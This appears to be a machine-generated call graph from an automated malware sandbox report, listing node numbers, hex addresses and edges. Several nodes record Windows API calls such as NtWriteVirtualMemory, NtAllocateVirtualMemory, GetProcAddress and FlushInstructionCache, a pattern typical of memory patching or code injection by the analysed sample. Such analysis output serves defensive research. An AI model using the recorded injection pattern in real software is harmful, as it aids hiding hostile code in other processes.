28090 2b70bdf 28088->28090 28091 2b713b3 28089->28091 28093 2b70c16 28090->28093 28092 2b713d2 28091->28092 28094 2b713ea 28092->28094 28095 2b70c2e 28093->28095 28096 2b689d0 4 API calls 28094->28096 28097 2b689d0 4 API calls 28095->28097 28100 2b713f6 28096->28100 28098 2b70c3a 28097->28098 28099 2b70c5b 28098->28099 28101 2b70c66 28099->28101 28102 2b7142f 28100->28102 28104 2b70c92 28101->28104 28103 2b7144e 28102->28103 28105 2b71466 28103->28105 28107 2b689d0 4 API calls 28104->28107 28106 2b689d0 4 API calls 28105->28106 28108 2b71472 28106->28108 28109 2b70cb6 28107->28109 28110 2b71494 28108->28110 28111 2b70cd8 28109->28111 28114 2b714d0 28110->28114 28112 2b70d09 28111->28112 28113 2b70d14 28112->28113 28117 2b70d40 28113->28117 28115 2b714fc 28114->28115 28116 2b71507 28115->28116 28119 2b71514 28116->28119 28118 2b70d58 28117->28118 28121 2b689d0 4 API calls 28118->28121 28120 2b689d0 4 API calls 28119->28120 28122 2b71520 28120->28122 28123 2b70d64 28121->28123 28125 2b7154c 28122->28125 28124 2b70d85 28123->28124 28128 2b70d90 28124->28128 28126 2b71578 28125->28126 28127 2b71583 28126->28127 28130 2b71590 28127->28130 28129 2b70dd4 28128->28129 28132 2b689d0 4 API calls 28129->28132 28131 2b689d0 4 API calls 28130->28131 28133 2b7159c 28131->28133 28134 2b70de0 28132->28134 28136 2b715c8 28133->28136 28135 2b70e01 28134->28135 28137 2b70e0c 28135->28137 28140 2b715ff 28136->28140 28138 2b70e43 28137->28138 28139 2b70e50 28138->28139 28142 2b689d0 4 API calls 28139->28142 28141 2b689d0 4 API calls 28140->28141 28145 2b71618 28141->28145 28143 2b70e5c 28142->28143 28144 2b70e71 28143->28144 28148 2b70e84 28144->28148 28146 2b71640 28145->28146 28147 2b71661 28146->28147 28150 2b71679 28147->28150 28149 2b70ebd 28148->28149 28151 2b70ee7 28149->28151 28153 2b716a3 28150->28153 28152 2b70ef4 28151->28152 28155 2b689d0 4 API calls 28152->28155 28154 2b689d0 4 API calls 28153->28154 28156 2b716bc 28154->28156 28157 2b70f00 28155->28157 28159 2b716dd 28156->28159 28158 2b70f39 28157->28158 28160 2b70f63 28158->28160 28162 2b7171f 28159->28162 28161 2b70f70 28160->28161 28164 2b689d0 4 API calls 28161->28164 28163 2b689d0 4 API calls 28162->28163 28165 2b71738 28163->28165 28166 2b70f7c 28164->28166 28167 2b71759 28165->28167 28168 2b70f9d 28166->28168 28170 2b712f9 28166->28170 28169 2b71790 28167->28169 28171 2b70fbe 28168->28171 28172 2b7179b 28169->28172 28173 2b72b11 28170->28173 28177 2b70ff5 28171->28177 28174 2b717a8 28172->28174 28179 2b72b3b 28173->28179 28175 2b689d0 4 API calls 28174->28175 28176 2b717b4 28175->28176 28182 2b717c3 28176->28182 28178 2b7100d 28177->28178 28181 2b689d0 4 API calls 28178->28181 28180 2b689d0 4 API calls 28179->28180 28185 2b72b54 28180->28185 28183 2b71019 28181->28183 28187 2b717fe 28182->28187 28184 2b7103a 28183->28184 28186 2b71045 28184->28186 28190 2b72b8d 28185->28190 28191 2b71071 28186->28191 28188 2b7182a 28187->28188 28189 2b71835 28188->28189 28192 2b71842 28189->28192 28193 2b72bc4 28190->28193 28194 2b71089 28191->28194 28195 2b689d0 4 API calls 28192->28195 28197 2b689d0 4 API calls 28193->28197 28198 2b689d0 4 API calls 28194->28198 28196 2b7184e 28195->28196 28202 2b7187a 28196->28202 28201 2b72bd0 28197->28201 28199 2b71095 28198->28199 28200 2b710b6 28199->28200 28206 2b710c1 28200->28206 28205 2b72c09 28201->28205 28203 2b718a6 28202->28203 28204 2b718b1 28203->28204 28208 2b718be 28204->28208 28210 2b72c40 28205->28210 28207 2b71105 28206->28207 28213 2b689d0 4 API calls 28207->28213 28209 2b689d0 4 API calls 28208->28209 28211 2b718ca 28209->28211 28212 2b689d0 4 API calls 28210->28212 28211->28170 28216 2b718dc 28211->28216 28217 2b72c4c 28212->28217 28214 2b71111 28213->28214 28215 2b71132 28214->28215 28220 2b7113d 28215->28220 28218 2b718fd 28216->28218 28219 2b72c78 28217->28219 28227 2b71915 28218->28227 28221 2b72ca4 28219->28221 28222 2b71174 28220->28222 28223 2b72caf 28221->28223 28224 2b71181 28222->28224 28225 2b689d0 4 API calls 28223->28225 28226 2b689d0 4 API calls 28224->28226 28228 2b72cc8 28225->28228 28229 2b7118d 28226->28229 28230 2b689d0 4 API calls 28227->28230 28228->27946 28234 2b72ced 28228->28234 28231 2b711ae 28229->28231 28232 2b71958 28230->28232 28235 2b711b9 28231->28235 28233 2b71979 28232->28233 28238 2b71991 28233->28238 28239 2b72d26 28234->28239 28236 2b711f0 28235->28236 28237 2b689d0 4 API calls 28236->28237 28240 2b71209 28237->28240 28243 2b689d0 4 API calls 28238->28243 28241 2b689d0 4 API calls 28239->28241 28242 2b71213 28240->28242 28245 2b72d69 28241->28245 28246 2b71220 28242->28246 28244 2b719d4 28243->28244 28247 2b719de 28244->28247 28250 2b72da2 28245->28250 28248 2b7129e 28246->28248 28253 2b71a39 28247->28253 28249 2b712b6 28248->28249 28252 2b712d5 28249->28252 28251 2b689d0 4 API calls 28250->28251 28256 2b72de5 28251->28256 28254 2b712e0 28252->28254 28255 2b71a70 28253->28255 28258 2b689d0 4 API calls 28254->28258 28257 2b689d0 4 API calls 28255->28257 28261 2b72e1e 28256->28261 28259 2b71a7c 28257->28259 28258->28170 28260 2b71a9d 28259->28260 28262 2b71ab5 28260->28262 28263 2b72e55 28261->28263 28265 2b71ad4 28262->28265 28264 2b689d0 4 API calls 28263->28264 28266 2b72e61 28264->28266 28267 2b71aec 28265->28267 28268 2b72e8d 28266->28268 28269 2b689d0 4 API calls 28267->28269 28272 2b72e9a 28268->28272 28270 2b71af8 28269->28270 28271 2b71b19 28270->28271 28274 2b71b31 28271->28274 28273 2b72ec4 28272->28273 28275 2b689d0 4 API calls 28273->28275 28277 2b71b50 28274->28277 28276 2b72edd 28275->28276 28278 2b72ee7 28276->28278 28279 2b689d0 4 API calls 28277->28279 28283 2b72f09 28278->28283 28280 2b71b74 28279->28280 28281 2b71b95 28280->28281 28282 2b71bad 28281->28282 28284 2b71bcc 28282->28284 28285 2b72f6c 28283->28285 28286 2b71be4 28284->28286 28287 2b689d0 4 API calls 28285->28287 28288 2b689d0 4 API calls 28286->28288 28290 2b72f85 28287->28290 28289 2b71bf0 28288->28289 28292 2b71c1c 28289->28292 28291 2b72fb1 28290->28291 28293 2b72fbe 28291->28293 28294 2b71c48 28292->28294 28295 2b72fdd 28293->28295 28296 2b71c53 28294->28296 28297 2b72fe8 28295->28297 28298 2b71c60 28296->28298 28299 2b72ff5 28297->28299 28300 2b689d0 4 API calls 28298->28300 28301 2b689d0 4 API calls 28299->28301 28302 2b71c6c 28300->28302 28306 2b73001 28301->28306 28303 2b71c97 28302->28303 28304 2b71cc3 28303->28304 28305 2b71cd0 28304->28305 28307 2b71cef 28305->28307 28308 2b7305a 28306->28308 28309 2b71cfa 28307->28309 28310 2b73091 28308->28310 28312 2b689d0 4 API calls 28309->28312 28311 2b689d0 4 API calls 28310->28311 28314 2b7309d 28311->28314 28313 2b71d13 28312->28313 28315 2b71d4c 28313->28315 28316 2b730d6 28314->28316 28317 2b71d76 28315->28317 28318 2b7310d 28316->28318 28319 2b689d0 4 API calls 28317->28319 28320 2b689d0 4 API calls 28318->28320 28321 2b71d8f 28319->28321 28323 2b73119 28320->28323 28322 2b71db0 28321->28322 28325 2b71dc8 28322->28325 28324 2b73152 28323->28324 28326 2b73171 28324->28326 28328 2b71df2 28325->28328 28327 2b7317c 28326->28327 28329 2b73189 28327->28329 28330 2b689d0 4 API calls 28328->28330 28331 2b689d0 4 API calls 28329->28331 28332 2b71e0b 28330->28332 28333 2b73195 28331->28333 28337 2b71e36 28332->28337 28334 2b731a6 28333->28334 28335 2b731bc 28334->28335 28336 2b731cf 28335->28336 28338 2b731f0 28336->28338 28340 2b71e6d 28337->28340 28339 2b731fb 28338->28339 28341 2b73208 28339->28341 28342 2b71e85 28340->28342 28344 2b73227 28341->28344 28343 2b689d0 4 API calls 28342->28343 28348 2b71eb2 28342->28348 28343->28342 28345 2b73232 28344->28345 28346 2b7323f 28345->28346 28347 2b689d0 4 API calls 28346->28347 28349 2b7324b 28347->28349 28350 2b71eca 28348->28350 28355 2b7326c 28349->28355 28351 2b71ee9 28350->28351 28352 2b71ef4 28351->28352 28353 2b71f01 28352->28353 28354 2b689d0 4 API calls 28353->28354 28356 2b71f26 28353->28356 28354->28353 28357 2b689d0 4 API calls 28355->28357 28359 2b71f52 28356->28359 28358 2b732c7 28357->28358 28361 2b732e8 28358->28361 28360 2b71f7e 28359->28360 28362 2b71f89 28360->28362 28364 2b7331f 28361->28364 28363 2b689d0 4 API calls 28362->28363 28366 2b71fa2 28363->28366 28365 2b689d0 4 API calls 28364->28365 28367 2b73343 28365->28367 28368 2b71fce 28366->28368 28371 2b7337c 28367->28371 28369 2b71ffa 28368->28369 28370 2b72005 28369->28370 28372 2b689d0 4 API calls 28370->28372 28374 2b733b3 28371->28374 28567 2b7201e 28372->28567 28375 2b689d0 4 API calls 28374->28375 28377 2b733bf 28375->28377 28376 2b72030 28379 2b7205c 28376->28379 28378 2b733dd 28377->28378 28383 2b7340a 28378->28383 28380 2b72088 28379->28380 28381 2b72093 28380->28381 28382 2b689d0 4 API calls 28381->28382 28384 2b720ac 28382->28384 28389 2b73437 28383->28389 28385 2b720d8 28384->28385 28386 2b72104 28385->28386 28387 2b7210f 28386->28387 28388 2b689d0 4 API calls 28387->28388 28388->28567 28390 2b734b8 28389->28390 28391 2b689d0 4 API calls 28390->28391 28394 2b734d1 28391->28394 28392 2b7213f 28393 2b7216b 28392->28393 28398 2b72197 28393->28398 28396 2b73534 28394->28396 28395 2b689d0 4 API calls 28395->28398 28397 2b689d0 4 API calls 28396->28397 28400 2b7354d 28397->28400 28398->28395 28399 2b721e7 28398->28399 28405 2b72213 28399->28405 28401 2b73577 28400->28401 28436 2b736eb 28400->28436 28403 2b735a3 28401->28403 28402 2b689d0 4 API calls 28402->28405 28406 2b735da 28403->28406 28404 2b73739 28407 2b73770 28404->28407 28405->28402 28411 2b7225f 28405->28411 28408 2b689d0 4 API calls 28406->28408 28409 2b689d0 4 API calls 28407->28409 28415 2b735f3 28408->28415 28410 2b73789 28409->28410 28412 2b737aa 28410->28412 28414 2b722ae 28411->28414 28417 2b737e1 28412->28417 28413 2b689d0 4 API calls 28413->28414 28414->28413 28416 2b722e6 28414->28416 28419 2b73656 28415->28419 28418 2b722f3 28416->28418 28421 2b689d0 4 API calls 28417->28421 28422 2b72312 28418->28422 28420 2b689d0 4 API calls 28419->28420 28427 2b7366f 28420->28427 28423 2b73805 28421->28423 28424 2b7232a 28422->28424 28428 2b73859 28423->28428 28425 2b689d0 4 API calls 28424->28425 28426 2b72336 28425->28426 28429 2b72356 28426->28429 28431 2b736d2 28427->28431 28434 2b73890 28428->28434 28430 2b72377 28429->28430 28433 2b72382 28430->28433 28432 2b689d0 4 API calls 28431->28432 28432->28436 28437 2b723ae 28433->28437 28435 2b689d0 4 API calls 28434->28435 28438 2b738b4 28435->28438 28436->28404 28439 2b723b9 28437->28439 28442 2b738ed 28438->28442 28440 2b689d0 4 API calls 28439->28440 28441 2b723f3 28439->28441 28440->28439 28443 2b723fe 28441->28443 28444 2b73924 28442->28444 28446 2b7242a 28443->28446 28445 2b689d0 4 API calls 28444->28445 28447 2b73930 28445->28447 28448 2b72435 28446->28448 28450 2b7395c 28447->28450 28449 2b689d0 4 API calls 28448->28449 28451 2b7244e 28449->28451 28452 2b73993 28450->28452 28455 2b7249a 28451->28455 28453 2b689d0 4 API calls 28452->28453 28454 2b739ac 28453->28454 28458 2b739cd 28454->28458 28456 2b724c6 28455->28456 28457 2b724d1 28456->28457 28460 2b724de 28457->28460 28461 2b73a04 28458->28461 28459 2b689d0 4 API calls 28459->28460 28460->28459 28463 2b72516 28460->28463 28462 2b689d0 4 API calls 28461->28462 28469 2b73a28 28462->28469 28464 2b72542 28463->28464 28465 2b7254d 28464->28465 28467 2b7255a 28465->28467 28466 2b73a3d 28466->28469 28468 2b689d0 4 API calls 28467->28468 28471 2b72566 28468->28471 28469->28466 28473 2b73aae 28469->28473 28540 2b73df3 28469->28540 28470 2b7555c 28474 2b75593 28470->28474 28472 2b7259b 28471->28472 28479 2b725d2 28472->28479 28477 2b73ae7 28473->28477 28475 2b689d0 4 API calls 28474->28475 28476 2b755ac 28475->28476 28478 2b755cd 28476->28478 28480 2b73b1e 28477->28480 28485 2b75604 28478->28485 28483 2b725ea 28479->28483 28482 2b689d0 4 API calls 28480->28482 28481 2b689d0 4 API calls 28481->28483 28487 2b73b2a 28482->28487 28483->28481 28484 2b72617 28483->28484 28486 2b72622 28484->28486 28488 2b689d0 4 API calls 28485->28488 28491 2b7264e 28486->28491 28490 2b73b56 28487->28490 28489 2b75628 28488->28489 28498 2b75654 28489->28498 28492 2b73b8d 28490->28492 28495 2b72666 28491->28495 28494 2b689d0 4 API calls 28492->28494 28493 2b689d0 4 API calls 28493->28495 28496 2b73ba6 28494->28496 28495->28493 28497 2b72688 28495->28497 28500 2b73bc7 28496->28500 28502 2b7269b 28497->28502 28499 2b689d0 4 API calls 28498->28499 28501 2b756a4 28499->28501 28503 2b73bfe 28500->28503 28509 2b756d0 28501->28509 28505 2b726f3 28502->28505 28504 2b689d0 4 API calls 28503->28504 28508 2b73c22 28504->28508 28506 2b7270b 28505->28506 28507 2b689d0 4 API calls 28506->28507 28512 2b72717 28507->28512 28514 2b73c5b 28508->28514 28510 2b689d0 4 API calls 28509->28510 28511 2b75720 28510->28511 28523 2b75746 28511->28523 28513 2b72750 28512->28513 28515 2b7276f 28513->28515 28517 2b73c92 28514->28517 28516 2b7277a 28515->28516 28519 2b72787 28516->28519 28518 2b689d0 4 API calls 28517->28518 28521 2b73c9e 28518->28521 28520 2b689d0 4 API calls 28519->28520 28522 2b72793 28520->28522 28524 2b73cc7 28521->28524 28526 2b727c4 28522->28526 28525 2b689d0 4 API calls 28523->28525 28529 2b73d35 28524->28529 28534 2b757c2 28525->28534 28527 2b727f0 28526->28527 28528 2b727fb 28527->28528 28532 2b72808 28528->28532 28531 2b73d6c 28529->28531 28530 2b689d0 4 API calls 28530->28532 28533 2b689d0 4 API calls 28531->28533 28532->28530 28537 2b72840 28532->28537 28535 2b73d85 28533->28535 28536 2b689d0 4 API calls 28534->28536 28538 2b73dcb 28535->28538 28542 2b7583e 28536->28542 28566 2b7286c 28537->28566 28538->28540 28539 2b72877 28539->28567 28540->27913 28540->28470 28541 2b728b5 28544 2b7290d 28541->28544 28543 2b689d0 4 API calls 28542->28543 28549 2b758e6 28543->28549 28545 2b72925 28544->28545 28546 2b689d0 4 API calls 28545->28546 28547 2b72931 28546->28547 28548 2b7296a 28547->28548 28550 2b72989 28548->28550 28551 2b689d0 4 API calls 28549->28551 28552 2b72994 28550->28552 28556 2b75962 28551->28556 28553 2b729a1 28552->28553 28554 2b689d0 4 API calls 28553->28554 28555 2b729ad 28554->28555 28558 2b729ee 28555->28558 28557 2b689d0 4 API calls 28556->28557 28563 2b759de 28557->28563 28559 2b72a06 28558->28559 28560 2b72a25 28559->28560 28562 2b72a30 28560->28562 28561 2b689d0 4 API calls 28561->28562 28562->28561 28565 2b72a6a 28562->28565 28564 2b689d0 4 API calls 28563->28564 28569 2b75a5a 28564->28569 28565->28566 28566->28539 28567->28170 28567->28332 28567->28376 28567->28392 28567->28541 28568 2b689d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28567->28568 29182 2b6e4b8 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28567->29182 28568->28567 28570 2b689d0 4 API calls 28569->28570 28571 2b75b07 28570->28571 28572 2b689d0 4 API calls 28571->28572 28573 2b75b83 28572->28573 28574 2b689d0 4 API calls 28573->28574 28575 2b75bff 28574->28575 28576 2b689d0 4 API calls 28575->28576 28577 2b75c7b 28576->28577 28578 2b689d0 4 API calls 28577->28578 28579 2b75cf7 28578->28579 28580 2b689d0 4 API calls 28579->28580 28581 2b75d73 28580->28581 28582 2b77568 28581->28582 28584 2b75dd3 28581->28584 28583 2b689d0 4 API calls 28582->28583 28586 2b775e4 28583->28586 28585 2b689d0 4 API calls 28584->28585 28588 2b75e4f 28585->28588 28587 2b689d0 4 API calls 28586->28587 28590 2b77660 28587->28590 28589 2b689d0 4 API calls 28588->28589 28592 2b75ecb 28589->28592 28591 2b689d0 4 API calls 28590->28591 28594 2b776dc 28591->28594 28593 2b689d0 4 API calls 28592->28593 28598 2b75f47 28593->28598 28595 2b689d0 4 API calls 28594->28595 28596 2b77758 28595->28596 28597 2b689d0 4 API calls 28596->28597 28599 2b777d4 28597->28599 28600 2b689d0 4 API calls 28598->28600 28603 2b777e9 28599->28603 28604 2b78318 28599->28604 28601 2b75ffb 28600->28601 28602 2b689d0 4 API calls 28601->28602 28607 2b76077 28602->28607 28605 2b689d0 4 API calls 28603->28605 28606 2b689d0 4 API calls 28604->28606 28610 2b77865 28605->28610 28609 2b78394 28606->28609 28608 2b689d0 4 API calls 28607->28608 28613 2b760f3 28608->28613 28612 2b689d0 4 API calls 28609->28612 28611 2b689d0 4 API calls 28610->28611 28615 2b778e1 28611->28615 28616 2b78410 28612->28616 28614 2b689d0 4 API calls 28613->28614 28624 2b7616f 28614->28624 28618 2b689d0 4 API calls 28615->28618 28617 2b689d0 4 API calls 28616->28617 28621 2b7848c 28617->28621 28619 2b7795d 28618->28619 29184 2b685bc GetModuleHandleA GetProcAddress 28619->29184 28622 2b689d0 4 API calls 28621->28622 28623 2b78508 28622->28623 28625 2b7851d 28623->28625 28631 2b793a1 28623->28631 28626 2b689d0 4 API calls 28624->28626 28629 2b7853e 28625->28629 28633 2b7623c 28626->28633 28627 2b77986 28628 2b689d0 4 API calls 28627->28628 28636 2b77a02 28628->28636 28630 2b78575 28629->28630 28634 2b689d0 4 API calls 28630->28634 28632 2b689d0 4 API calls 28631->28632 28641 2b7941d 28632->28641 28635 2b689d0 4 API calls 28633->28635 28638 2b78599 28634->28638 28643 2b762b8 28635->28643 28637 2b689d0 4 API calls 28636->28637 28647 2b77a7e 28637->28647 28639 2b785d2 28638->28639 28640 2b78609 28639->28640 28644 2b689d0 4 API calls 28640->28644 28642 2b689d0 4 API calls 28641->28642 28651 2b79499 28642->28651 28645 2b689d0 4 API calls 28643->28645 28646 2b78615 28644->28646 28652 2b76334 28645->28652 28649 2b78641 28646->28649 28648 2b689d0 4 API calls 28647->28648 28658 2b77afa 28648->28658 28650 2b78678 28649->28650 28653 2b689d0 4 API calls 28650->28653 28654 2b689d0 4 API calls 28651->28654 28655 2b689d0 4 API calls 28652->28655 28656 2b78691 28653->28656 28668 2b79515 28654->28668 28662 2b763b0 28655->28662 28657 2b786bd 28656->28657 28660 2b786e0 28657->28660 28659 2b689d0 4 API calls 28658->28659 28672 2b77b9d 28659->28672 28661 2b7876e 28660->28661 28664 2b786f2 28660->28664 28667 2b7878f 28661->28667 28663 2b689d0 4 API calls 28662->28663 28677 2b7642c 28663->28677 28669 2b7871e 28664->28669 28665 2b79cf5 28666 2b689d0 4 API calls 28665->28666 28680 2b79d71 28666->28680 28674 2b787a7 28667->28674 28668->28665 28670 2b689d0 4 API calls 28668->28670 28671 2b78755 28669->28671 28682 2b795bb 28670->28682 28676 2b689d0 4 API calls 28671->28676 28673 2b689d0 4 API calls 28672->28673 28686 2b77c19 28673->28686 28675 2b689d0 4 API calls 28674->28675 28678 2b787ea 28675->28678 28676->28661 28679 2b689d0 4 API calls 28677->28679 28688 2b78823 28678->28688 28683 2b764a8 28679->28683 28681 2b689d0 4 API calls 28680->28681 28691 2b79ded 28681->28691 28684 2b689d0 4 API calls 28682->28684 29183 2b685bc GetModuleHandleA GetProcAddress 28683->29183 28693 2b79637 28684->28693 28687 2b689d0 4 API calls 28686->28687 28698 2b77c95 28687->28698 28689 2b689d0 4 API calls 28688->28689 28690 2b78866 28689->28690 28701 2b788b9 28690->28701 28692 2b689d0 4 API calls 28691->28692 28696 2b79e69 28692->28696 28695 2b689d0 4 API calls 28693->28695 28694 2b764e6 28697 2b689d0 4 API calls 28694->28697 28711 2b796b3 28695->28711 28699 2b689d0 4 API calls 28696->28699 28707 2b76562 28697->28707 28700 2b689d0 4 API calls 28698->28700 28702 2b79e9c 28699->28702 28710 2b77d30 28700->28710 28704 2b689d0 4 API calls 28701->28704 28703 2b689d0 4 API calls 28702->28703 28706 2b79ecf 28703->28706 28705 2b78914 28704->28705 28715 2b78935 28705->28715 28708 2b689d0 4 API calls 28706->28708 28709 2b689d0 4 API calls 28707->28709 28712 2b79f02 28708->28712 28718 2b765de 28709->28718 28713 2b689d0 4 API calls 28710->28713 28716 2b689d0 4 API calls 28711->28716 28714 2b689d0 4 API calls 28712->28714 28720 2b77dac 28713->28720 28722 2b79f35 28714->28722 28717 2b689d0 4 API calls 28715->28717 28723 2b7978a 28716->28723 28726 2b78990 28717->28726 28719 2b689d0 4 API calls 28718->28719 28730 2b7665a 28719->28730 28721 2b689d0 4 API calls 28720->28721 28737 2b77e28 28721->28737 28724 2b689d0 4 API calls 28722->28724 28725 2b689d0 4 API calls 28723->28725 28732 2b79fb1 28724->28732 28734 2b79806 28725->28734 28727 2b689d0 4 API calls 28726->28727 28728 2b78a0c 28727->28728 29187 2b6d164 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28728->29187 28731 2b689d0 4 API calls 28730->28731 28743 2b766d6 28731->28743 28733 2b689d0 4 API calls 28732->28733 28747 2b7a02d 28733->28747 28735 2b689d0 4 API calls 28734->28735 28805 2b79aa9 28734->28805 28749 2b79894 28735->28749 28736 2b689d0 4 API calls 28750 2b79b6b 28736->28750 28739 2b689d0 4 API calls 28737->28739 28738 2b78a20 28740 2b689d0 4 API calls 28738->28740 28742 2b77ee5 28739->28742 28754 2b78aa1 28740->28754 28741 2b768db 28744 2b689d0 4 API calls 28741->28744 29185 2b67e50 GetModuleHandleA GetProcAddress 28742->29185 28743->28741 28746 2b689d0 4 API calls 28743->28746 28760 2b769c5 28744->28760 28759 2b76767 28746->28759 28748 2b689d0 4 API calls 28747->28748 28753 2b7a0a9 28748->28753 28751 2b689d0 4 API calls 28749->28751 28752 2b689d0 4 API calls 28750->28752 28767 2b79910 28751->28767 28766 2b79be7 28752->28766 28756 2b689d0 4 API calls 28753->28756 28755 2b689d0 4 API calls 28754->28755 28771 2b78b1d 28755->28771 28758 2b7a0dc 28756->28758 28757 2b77f08 28762 2b689d0 4 API calls 28757->28762 28764 2b689d0 4 API calls 28758->28764 28763 2b689d0 4 API calls 28759->28763 28761 2b689d0 4 API calls 28760->28761 28779 2b76a41 28761->28779 28776 2b77f84 28762->28776 28778 2b767e3 28763->28778 28765 2b7a10f 28764->28765 28770 2b689d0 4 API calls 28765->28770 28769 2b689d0 4 API calls 28766->28769 28768 2b689d0 4 API calls 28767->28768 28789 2b7998c 28768->28789 28785 2b79c63 28769->28785 28774 2b7a142 28770->28774 28772 2b689d0 4 API calls 28771->28772 28773 2b78b99 28772->28773 28788 2b78bb9 28773->28788 29188 2b68730 GetModuleHandleA GetProcAddress 28773->29188 28777 2b689d0 4 API calls 28774->28777 28780 2b689d0 4 API calls 28776->28780 28783 2b7a175 28777->28783 28781 2b689d0 4 API calls 28778->28781 28782 2b689d0 4 API calls 28779->28782 28795 2b78000 28780->28795 28793 2b7685f 28781->28793 28794 2b76abd 28782->28794 28784 2b689d0 4 API calls 28783->28784 28799 2b7a1a8 28784->28799 28786 2b689d0 4 API calls 28785->28786 28787 2b79cdf 28786->28787 29026 2b68d70 28787->29026 28790 2b689d0 4 API calls 28788->28790 28791 2b689d0 4 API calls 28789->28791 28801 2b78c35 28790->28801 28803 2b79a2d 28791->28803 28797 2b689d0 4 API calls 28793->28797 28798 2b689d0 4 API calls 28794->28798 28796 2b689d0 4 API calls 28795->28796 28807 2b7807c 28796->28807 28797->28741 28806 2b76b39 28798->28806 28800 2b689d0 4 API calls 28799->28800 28813 2b7a224 28800->28813 28802 2b689d0 4 API calls 28801->28802 28815 2b78cb1 28802->28815 28804 2b689d0 4 API calls 28803->28804 28804->28805 28805->28736 28808 2b689d0 4 API calls 28806->28808 28809 2b689d0 4 API calls 28807->28809 28819 2b76bb5 28808->28819 28810 2b780f8 28809->28810 29186 2b6b118 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28810->29186 28812 2b78109 28812->27913 28814 2b689d0 4 API calls 28813->28814 28817 2b7a2a0 28814->28817 28816 2b689d0 4 API calls 28815->28816 28821 2b78d2d 28816->28821 28818 2b689d0 4 API calls 28817->28818 28822 2b7a2d3 28818->28822 28820 2b689d0 4 API calls 28819->28820 28825 2b76c31 28820->28825 28823 2b689d0 4 API calls 28821->28823 28824 2b689d0 4 API calls 28822->28824 28827 2b78db4 28823->28827 28828 2b7a34f 28824->28828 28826 2b689d0 4 API calls 28825->28826 28831 2b76cad 28826->28831 28829 2b689d0 4 API calls 28827->28829 28830 2b689d0 4 API calls 28828->28830 28833 2b78e30 28829->28833 28834 2b7a3cb 28830->28834 28832 2b689d0 4 API calls 28831->28832 28844 2b76d48 28832->28844 28835 2b689d0 4 API calls 28833->28835 28836 2b689d0 4 API calls 28834->28836 28841 2b78eac 28835->28841 28837 2b7a447 28836->28837 28838 2b689d0 4 API calls 28837->28838 28839 2b7a47a 28838->28839 28840 2b689d0 4 API calls 28839->28840 28843 2b7a4ad 28840->28843 28842 2b689d0 4 API calls 28841->28842 28849 2b78f33 28842->28849 28845 2b689d0 4 API calls 28843->28845 28846 2b689d0 4 API calls 28844->28846 28847 2b7a4e0 28845->28847 28851 2b76e43 28846->28851 28848 2b689d0 4 API calls 28847->28848 28853 2b7a513 28848->28853 28850 2b689d0 4 API calls 28849->28850 28855 2b78faf 28850->28855 28852 2b689d0 4 API calls 28851->28852 28859 2b76ebf 28852->28859 28854 2b689d0 4 API calls 28853->28854 28857 2b7a58f 28854->28857 28856 2b689d0 4 API calls 28855->28856 28862 2b7902b 28856->28862 28858 2b689d0 4 API calls 28857->28858 28861 2b7a60b 28858->28861 28860 2b689d0 4 API calls 28859->28860 28867 2b76f77 28860->28867 28863 2b689d0 4 API calls 28861->28863 28864 2b689d0 4 API calls 28862->28864 28865 2b7a63e 28863->28865 28871 2b790a7 28864->28871 28866 2b689d0 4 API calls 28865->28866 28868 2b7a671 28866->28868 28869 2b689d0 4 API calls 28867->28869 28870 2b689d0 4 API calls 28868->28870 28876 2b76ff3 28869->28876 28873 2b7a6a4 28870->28873 28872 2b689d0 4 API calls 28871->28872 28878 2b79123 28872->28878 28874 2b689d0 4 API calls 28873->28874 28875 2b7a6d7 28874->28875 28877 2b689d0 4 API calls 28875->28877 28876->27913 28880 2b7a70a 28877->28880 28879 2b689d0 4 API calls 28878->28879 28882 2b7919f 28879->28882 28881 2b689d0 4 API calls 28880->28881 28891 2b7a786 28881->28891 28883 2b689d0 4 API calls 28882->28883 28884 2b7921b 28883->28884 29189 2b6894c 28884->29189 28886 2b7923a 28887 2b6894c 3 API calls 28886->28887 28888 2b7924e 28887->28888 28889 2b6894c 3 API calls 28888->28889 28890 2b79262 28889->28890 28892 2b6894c 3 API calls 28890->28892 28893 2b689d0 4 API calls 28891->28893 28894 2b79276 28892->28894 28898 2b7a802 28893->28898 28895 2b6894c 3 API calls 28894->28895 28896 2b7928a 28895->28896 28897 2b6894c 3 API calls 28896->28897 28900 2b7929e 28897->28900 28899 2b689d0 4 API calls 28898->28899 28902 2b7a87e 28899->28902 28901 2b689d0 4 API calls 28900->28901 28904 2b79325 28901->28904 28903 2b689d0 4 API calls 28902->28903 28906 2b7a8fa 28903->28906 28905 2b689d0 4 API calls 28904->28905 28905->28631 28907 2b689d0 4 API calls 28906->28907 28908 2b7a976 28907->28908 28909 2b689d0 4 API calls 28908->28909 28910 2b7a985 28909->28910 28911 2b689d0 4 API calls 28910->28911 28912 2b7a994 28911->28912 28913 2b689d0 4 API calls 28912->28913 28914 2b7a9a3 28913->28914 28915 2b689d0 4 API calls 28914->28915 28916 2b7a9b2 28915->28916 28917 2b689d0 4 API calls 28916->28917 28918 2b7a9c1 28917->28918 28919 2b689d0 4 API calls 28918->28919 28920 2b7a9d0 28919->28920 28921 2b689d0 4 API calls 28920->28921 28922 2b7a9df 28921->28922 28923 2b689d0 4 API calls 28922->28923 28924 2b7a9ee 28923->28924 28925 2b689d0 4 API calls 28924->28925 28926 2b7a9fd 28925->28926 28927 2b689d0 4 API calls 28926->28927 28928 2b7aa0c 28927->28928 28929 2b689d0 4 API calls 28928->28929 28930 2b7aa1b 28929->28930 28931 2b689d0 4 API calls 28930->28931 28932 2b7aa2a 28931->28932 28933 2b689d0 4 API calls 28932->28933 28934 2b7aa39 28933->28934 28935 2b689d0 4 API calls 28934->28935 28936 2b7aa48 28935->28936 28937 2b689d0 4 API calls 28936->28937 28938 2b7aa57 28937->28938 28939 2b689d0 4 API calls 28938->28939 28940 2b7aad3 28939->28940 28941 2b689d0 4 API calls 28940->28941 28942 2b7ab06 28941->28942 28943 2b689d0 4 API calls 28942->28943 28944 2b7ab39 28943->28944 28945 2b689d0 4 API calls 28944->28945 28946 2b7ab6c 28945->28946 28947 2b689d0 4 API calls 28946->28947 28948 2b7ab9f 28947->28948 28949 2b689d0 4 API calls 28948->28949 28950 2b7abd2 28949->28950 28951 2b689d0 4 API calls 28950->28951 28952 2b7ac05 28951->28952 28953 2b689d0 4 API calls 28952->28953 